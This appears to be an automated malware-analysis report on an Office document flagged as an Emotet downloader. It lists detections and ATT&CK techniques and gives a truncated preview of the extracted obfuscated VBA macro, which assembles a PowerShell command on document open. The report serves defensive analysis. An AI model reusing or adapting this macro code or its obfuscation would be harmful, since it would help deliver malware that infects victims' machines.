Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a call to the 'Shell()' function, which is used to execute a PowerShell command. This PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emotet-6958951-0' strongly suggests the Emotet family.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-6958951-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Emotet-6958951-0
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39919 bytes |

SHA-256: 684216f2601d2723b6d12e03d003a340c6c41855994047b98a1229900b475cf2

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "GrzhTXnzDzO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
jHEmN = 59537 + SDPVmV * 57981 + WXJNd / oniths - rIUzC * sACrPb + wITqJY + (65497 + rQdWk)
GHrLzi = 58409 + qNOEzJ * 39278 + EuImfD / qINwG - wINEw * wBHBFz + rzhsS + (16363 + rHTFlz)
ArqcRc = 95420 + cwjphX * 25921 + UYvwO / kjlFc - BlIWb * aDEsTB + crhKvz + (29737 + uTMNO)
MvwEXjSV = Application.Run("LOjXRfB", "" + ZtfmQauvVk + HUfulinfTokI + aDrXWllAMM + bDvpbwOu + iJspMwmlwrj + TbzHpwOwEw + lFjJvLrnm + qAiNvpa + UTTXQV + ViCzlznUUE + frQpiwvZYI + oVMdbkT + VhoWcHah + WsZIUYlAZ + iAuPTBZVaF + qBjcFUL + DlmXZtE + AMXazsDofMbJQv)
IfNFVj = 9205 + JQZVi * 50694 + dnMQdt / QzSiOa - OQNFN * ZBnKVN + QcCOj + (58086 + EpKNP)
ZppHTz = 89337 + AEQTa * 51178 + tjsRvC / JbCzS - Hrnqwr * EPtjB + JZtck + (28581 + PicXd)
POnnS = 58909 + vAMPUi * 38161 + zBvPrb / wDBjDU - FAqdb * nzWCj + VbqzL + (91794 + cpIRA)
End Sub
Attribute VB_Name = "bRklibNWvMZrH"
Function aDrXWllAMM()
On Error Resume Next
QfsVw = 77611 + WjVwlw * 16426 / jaTjLM + DvarT + Wjsva - 42995 * VCqcR
wzTsz = alfmrm - mqPEX * UiZRzw + 26893 / 74262 + AvLYF / aTLIz * BHDiFB
vGtDI = "" + qMLDtWTHmUbEt + uEVUzzdBKZHQjk + "POW" + sIjNiPoZA + GazSHtFwXww + "ERS" + MLBdmGmXuFjwK + fQvUwVXaL + "helL" + XboTTtDsAWNLnt + LUPWwir + " " + Chr(34)
AiIUp = 70911 * VmjLia + psRNrR / HafRL * vlCsj - MSOvY
USRwtCMzZ = "" + pBJFVkiZdi + zCtEcDdiukjrbL + ". ((" + bztCFtPFQa + XWHXbjXKZKS + "vaR" + HdERSdKWOwjl + GmnnCHDGXcMPso + "IAbL" + QiXUzPKowwlDJX + MpQXlXQOiAGb + "E "
lWTTi = Nuwrc - oFVzwA - 3677 - DDXfJ - OJqzJi / vLPkqo * 48261 * SsZvm - KsfDFa / ziwoKp / 76288 - EzhtQ
GPGLcB = KzjWKD - KtDIC - 91696 - QvjzlU - srCVo / lQztz * 58028 * XBEnf - mtGdkN / QqTaMr / 64356 - RFhAV
uwKLYj = OrsTB - VmNRIr - 1579 - wWjFws - wXmKz / wKTZp * 33305 * bchsq - AfrPsi / jwZdFb / 76307 - STFJD
MvOHEjijqb = "" + usSZqUUpnPw + EHufMWAkpTN + "'*" + IIbjmZdD + ZEvPdjppfv + "MDr*" + LLirDWrEY + jLLNEcXOWHkUbR + "')."
Bziii = uwQFvV - LszUI - 27399 - RVlMH - DGbrCa / AqFuWO * 95046 * OzzhC - LPkzS / DEfOR / 52329 - fnVZC
GVmFw = QmCYlf - arrqr - 69828 - svLqc - NRdtYz / dAqcf * 2819 * mRCGd - Wanwih / wjLKv / 55229 - hzJJA
bZBPL = MkbtEN - ZmdjPq - 61163 - zpjjC - rmItGp / uBmhS * 84486 * NESFi - duVctJ / FikVi / 18268 - VwTzzY
uICvwwLjpi = "" + rzwwaAsWawQU + jzzhMQRQw + "name" + kPlSIJM + icwLhFlN + "[3" + sWYhnAzrMNUa + zplHERoDVomDC + ",11," + HfDVOQiMhwRISA + EcINsUdIdvpAk + "2]-" + zNrFiQElXTdD + IWDkzibuZHmB + "jO"
TbdcnO = vavCX - qktPRU - 42291 - YlQkM - DokSh / MRwpA * 30489 * SNvHhb - kJfrVj / XupNs / 51493 - QGqdV
sjoNnaua = "" + nDOBZDHcii + YuIswAwpWHb + "IN" + pCGFiMZuLVbdU + PSKfjwhVwz + "'') " + GwBjbGMjAB + WjjMZhP + "( " + aaEwwYsIhIHzrS + ozXIXVNu + "\" + Chr(34) + " " + ANUwRiDa + wjfhTaTtPC + "$(" + mCkhsUVEM + nYfolqZuQlYN + "SeT-"
pozCU = IijaSL - qjFcLm - 94592 - JomiCq - NiOof / CjYCr * 59766 * IoFVZH - KLJMaI / jALUSp / 880 - ELijX
hZUHT = UiQIvH - BVBNWj - 41588 - NiZqdr - trskuH / jsTouM * 33413 * LXhDPj - QJnSX / ruRpr / 69360 - ZPLMpX
uhoJO = WCIab - jajwc - 69150 - swBzD - bVvLVN / wBWbwJ * 17537 * UsJPP - GwjOjF / sKsil / 62987 - zbqmMj
lzYkdutwIK = "" + HzTaJXF + otVWOzmHjFqd + "VaR" + cWDtBXDjj + ZRQiDVFzzznQbM + "Ia" + EDzraOkqEFiDVf + wcpjWdck + "BLe " + tQoFchIXwdj + LjZazrBiT + "'ofs" + UwXNdbaMFwU + wdzvzhi + "' '" + JdzwCftkz + NliJvuXDXbW + "')" + XcUuFhmL + ptNjZuT + "\" + Chr(34) + vtoMwnzDKbFnmn + aKziSnOOhp + Chr(43) + " [s" + NwIDFavSiPVG + cktQCGbHwkU + "TrI" + HfafJXSpLSC + rUqLosYo + "nG]"
UQmJGF = XiOvnn - jMinn - 31905 - riqOH - nvcTp / AFPWOL * 69151 * uTTQE - hbcJkB / Mciwuz / 78726 - cGvGq
UpUbD = WYOZK - jLSSio - 4899 - chaUMv - SMYKNt / HnpIzp * 81380 * TXjYF - KoMSo / amPzOI / 8470 - LpPzj
DaLIJX = "" + caqMzYNDlnp + YMrZvEVY + "( " +
```
... (truncated)